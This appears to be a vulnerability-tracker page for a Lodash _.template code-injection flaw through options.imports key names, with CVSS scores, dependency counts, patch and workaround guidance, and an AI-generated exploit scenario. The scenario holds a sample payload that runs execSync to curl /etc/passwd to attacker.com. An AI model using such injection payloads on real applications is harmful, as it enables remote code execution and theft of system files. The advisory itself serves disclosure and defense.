EUVD-2026-17610
GHSA-r5fr-rjxr-66jc
Severity by source
AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Primary rating from NVD.
CVSS VectorNVD
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
4Blast Radius
ecosystem impact- 224 npm packages depend on lodash (119 direct, 110 indirect)
- 1 npm packages depend on lodash-es (1 direct, 0 indirect)
- 2 npm packages depend on lodash.template (1 direct, 1 indirect)
Ecosystem-wide dependent count for version 4.0.0 and other introduced versions.
DescriptionCVE.org
Impact:
The fix for CVE-2021-23337 (https://github.com/advisories/GHSA-35jh-r3h4-6jhm) added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink.
When an application passes untrusted input as options.imports key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time.
Additionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().
Patches:
Users should upgrade to version 4.18.0.
Workarounds:
Do not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names.
AnalysisAI
Remote code execution in Lodash <4.18.0 allows unauthenticated attackers to execute arbitrary JavaScript code during template compilation by injecting malicious key names into options.imports parameter. The vulnerability bypasses the CVE-2021-23337 fix by exploiting an unvalidated code path that flows into the same Function() constructor sink. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Attacker must pass untrusted input as options.imports key names to _.template() in Lodash. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 8.1 score reflects high impact across confidentiality, integrity, and availability (C:H/I:H/A:H), with network attack vector (AV:N) and no privileges required (PR:N), making this broadly exploitable. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker identifies a Node.js web application using Lodash templates to render user dashboards, where dashboard configuration includes user-supplied widget names passed as keys in options.imports. The attacker registers a dashboard widget with the key name set to a malicious payload like 'x=require("child_process").execSync("curl attacker.com/exfil?data=$(cat /etc/passwd)")'. … |
| Remediation | Vendor-released patch: upgrade all Lodash installations to version 4.18.0 or later, which adds input validation for options.imports key names matching the protection applied to the variable option in CVE-2021-23337. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Inventory all applications using Lodash <4.18.0 via dependency scanning (npm audit, SBOM tools, or Software Composition Analysis platforms). …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Vendor StatusVendor
SUSE
Severity: High| Product | Status |
|---|---|
| SUSE Liberty Linux 9 | Fixed |
Share
External POC / Exploit Code
Leaving vuln.today